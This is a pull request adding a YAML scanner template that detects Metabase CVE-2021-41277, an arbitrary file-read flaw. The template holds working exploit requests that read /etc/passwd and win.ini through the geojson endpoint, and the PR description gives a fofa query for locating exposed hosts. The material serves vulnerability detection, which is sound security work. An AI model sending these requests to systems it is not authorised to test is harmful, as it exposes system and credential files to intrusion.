### PR TITLE
poc-yaml-metabase-geojson-cve-2021-41277-fileread

### DIFF
--- a/pocs/poc-yaml-metabase-geojson-cve-2021-41277-fileread.yml
+++ b/pocs/poc-yaml-metabase-geojson-cve-2021-41277-fileread.yml
@@ -1,0 +1,22 @@
+name: poc-yaml-metabase-geojson-cve-2021-41277-fileread
+manual: true
+transport: http
+rules:
+    meta0:
+        request:
+            cache: true
+            method: GET
+            path: /api/geojson?url=file:/etc/passwd
+        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+    meta1:
+        request:
+            cache: true
+            method: GET
+            path: /api/geojson?url=file:/Windows/win.ini
+        expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
+expression: meta0() || meta1()
+detail:
+    author: fengyang(https://github.com/bigDevi1)
+    links:
+        - https://t.zsxq.com/fAaAAUJ
+    description: Metabase geojson任意文件读取漏洞 CVE-2021-41277 


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Metabase geojson任意文件读取漏洞 CVE-2021-41277 
## 测试环境
fofa:"Metabase geojson"
## 备注
![image](https://user-images.githubusercontent.com/35722040/142810650-353b8d97-4ff0-49c2-8f02-42615fddfe0d.png)